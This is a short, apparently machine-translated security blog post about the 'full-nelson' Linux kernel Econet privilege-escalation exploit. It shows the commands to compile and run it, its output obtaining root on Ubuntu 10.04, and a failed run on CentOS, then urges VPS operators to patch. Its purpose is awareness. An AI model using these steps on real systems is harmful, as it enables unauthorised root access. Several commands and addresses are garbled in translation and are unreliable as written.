Attackers can exploit multiple security vulnerabilities in the Linux kernel to obtain root privileges.

Dan Rosenberg, a system security expert, released a C program. Over 200 lines of programs exploit three security vulnerabilities in the Linux Econet protocol, this can cause the local account to reject services or escalate privileges to the system. That is to say, a common user can easily obtain the root shell by running this program, the following has been tested on the updated Ubuntu 10.04 Server LTS:

 

$ Sudo apt-get update
$ Sudo apt-get upgrade

$ Uname-r
2.6.32-21-server

$ Gcc full-nelson.c-o full-nelson
$./Full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff81_bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
#
Because RHEL/CentOS does not support the Econet protocol by default, the test fails:

# Yum update

$ Uname-r
2.6.18-194.26.1.el5

$ Gcc full-nelson.c-o full-nelson
$./Full-nelson
[*] Failed to open file descriptors.
If Ubuntu is used in an enterprise environment, it may be quite a cup of cake. Several hundred accounts can always find one or two accounts which are obtained by internal or external personnel through the above program as root, the harm to the server is devastating. The day before yesterday, I was still saying that Ubuntu was useless in the kernel. Now I still have some concerns when I think of it. VPSee reminds friends who are using multiple common accounts to log on to Ubuntu VPS to upgrade or apply Kernel patches in a timely manner. Merchants who sell VPN/SSH accounts and provide free SSH should be especially careful when "customers" are in trouble, if you are using other Linux distributions, you 'd better check whether your VPS has these high-risk vulnerabilities.